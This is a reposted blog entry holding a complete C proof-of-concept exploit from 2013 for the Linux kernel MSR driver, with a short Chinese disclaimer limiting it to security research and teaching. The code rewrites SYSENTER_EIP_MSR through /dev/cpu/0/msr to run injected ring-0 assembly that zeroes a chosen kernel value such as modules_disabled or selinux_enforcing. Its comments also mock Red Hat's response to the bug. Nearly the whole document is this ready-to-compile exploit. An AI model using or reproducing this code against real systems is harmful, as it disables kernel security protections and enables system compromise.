Linux Kernel 'MSR' Driver Local Privilege Escalation

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  24. #define _GNU_SOURCE
  25. #include<stdio.h>
  26. #include<sched.h>
  27. #include<unistd.h>
  28. #include<sys/types.h>
  29. #include<sys/stat.h>
  30. #include<fcntl.h>
  31. #include<stdlib.h>
  32. #include<sys/time.h>
  33. #include<sys/resource.h>
  34. #include<sys/mman.h>
  35. #define SYSENTER_EIP_MSR 0x176
  36. u_int64_t msr;
  37. unsignedlong ourstack[65536];
  38. u_int64_t payload_data[16];
  39. externvoid*_ring0;
  40. externvoid*_ring0_end;
  41. void ring0(void)
  42. {
  43. __asm volatile(".globl _ring0\n"
  44. "_ring0:\n"
  45. ".intel_syntax noprefix\n"
  46. ".code64\n"
  47. // set up stack pointer with 'ourstack'
  48. "mov esp, ecx\n"
  49. // save registers, contains the original MSR value
  50. "push rax\n"
  51. "push rbx\n"
  52. "push rcx\n"
  53. "push rdx\n"
  54. // play with the kernel here with interrupts disabled!
  55. "mov rcx, qword ptr [rbx+8]\n"
  56. "test rcx, rcx\n"
  57. "jz skip_write\n"
  58. "mov dword ptr [rcx], 0\n"
  59. "skip_write:\n"
  60. // restore MSR value before returning
  61. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
  62. "mov eax, dword ptr [rbx]\n"
  63. "mov edx, dword ptr [rbx+4]\n"
  64. "wrmsr\n"
  65. "pop rdx\n"
  66. "pop rcx\n"
  67. "pop rbx\n"
  68. "pop rax\n"
  69. "sti\n"
  70. "sysexit\n"
  71. ".code32\n"
  72. ".att_syntax prefix\n"
  73. ".global _ring0_end\n"
  74. "_ring0_end:\n"
  75. );
  76. }
  77. unsignedlong saved_stack;
  78. int main(int argc,char*argv[])
  79. {
  80. cpu_set_tset;
  81. int msr_fd;
  82. int ret;
  83. u_int64_t new_msr;
  84. struct sched_param sched;
  85. u_int64_t resolved_addr =0ULL;
  86. if(argc ==2)
  87. resolved_addr = strtoull(argv[1], NULL,16);
  88. /* can do this without privilege */
  89. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  90. mlock(&payload_data,sizeof(payload_data));
  91. CPU_ZERO(&set);
  92. CPU_SET(0,&set);
  93. sched.sched_priority =99;
  94. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  95. if(ret){
  96. fprintf(stderr,"Unable to set priority.\n");
  97. exit(1);
  98. }
  99. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  100. if(ret){
  101. fprintf(stderr,"Unable to set affinity.\n");
  102. exit(1);
  103. }
  104. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  105. if(msr_fd <0){
  106. msr_fd = open("/dev/msr0", O_RDWR);
  107. if(msr_fd <0){
  108. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
  109. exit(1);
  110. }
  111. }
  112. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  113. ret = read(msr_fd,&msr,sizeof(msr));
  114. if(ret !=sizeof(msr)){
  115. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
  116. exit(1);
  117. }
  118. // stuff some addresses in a buffer whose address we
  119. // pass to the "kernel" via register
  120. payload_data[0]= msr;
  121. payload_data[1]= resolved_addr;
  122. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
  123. fflush(stdout);
  124. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  125. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  126. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
  127. fflush(stdout);
  128. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  129. if(ret !=sizeof(new_msr)){
  130. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
  131. exit(1);
  132. }
  133. __asm volatile(
  134. ".intel_syntax noprefix\n"
  135. ".code32\n"
  136. "mov saved_stack, esp\n"
  137. "lea ecx, ourstack\n"
  138. "lea edx, label2\n"
  139. "lea ebx, payload_data\n"
  140. "sysenter\n"
  141. "label2:\n"
  142. "mov esp, saved_stack\n"
  143. ".att_syntax prefix\n"
  144. );
  145. printf("Success.\n");
  146. return0;
  147. }
posted @ 2013-08-05 23:55  夏虫xm  阅读(545)  评论(0编辑  收藏  举报